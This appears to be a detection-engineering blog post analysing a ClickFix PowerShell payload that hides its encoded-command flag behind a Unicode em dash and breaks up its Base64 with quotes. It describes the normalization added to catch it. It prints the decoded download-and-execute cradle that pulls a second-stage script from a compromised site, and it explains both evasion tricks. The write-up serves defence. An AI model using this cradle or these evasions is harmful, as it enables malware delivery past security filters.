Em Dash Evasion — How ClickFix Attackers Exploit PowerShell's Unicode Tolerance

PowerShell accepts em dashes as parameter prefixes. Regex-based detectors don't. We found a ClickFix payload weaponizing this gap with a second layer of quote fragmentation on top.

The Technique

The payload used an em dash (U+2014, —) instead of a standard ASCII hyphen (U+002D, -) before the -e encoded command flag. PowerShell treats both identically when parsing parameters, but every regex pattern matching -enc, -encodedcommand, or -e expects the ASCII hyphen.

A second evasion layer was stacked on top: double quotes scattered throughout the Base64 blob. The string a"QBy"AG0A breaks contiguous pattern matching for Base64 runs like [A-Za-z0-9+/=]{20,}. PowerShell silently strips the quotes during argument parsing and reassembles valid Base64.

The decoded payload was a standard download cradle: irm https://corpstrat.com/wp-content/uploads/2026/02/run.ps1 | iex — a compromised WordPress site hosting a second-stage PowerShell script.

How We Added Detection

Two normalization steps were added to the scoring pipeline, running before any pattern matching:

The dash normalization covers en dash (U+2013), em dash (U+2014), figure dash (U+2012), horizontal bar (U+2015), mathematical minus (U+2212), and fullwidth hyphen (U+FF0D) — every Unicode codepoint that PowerShell accepts as a parameter prefix.

After normalization, the payload becomes pOweRSHeLL -e aQByAG0AIABoAHQ... — clean Base64, ASCII hyphen — and scores 95 against existing patterns. Blocked.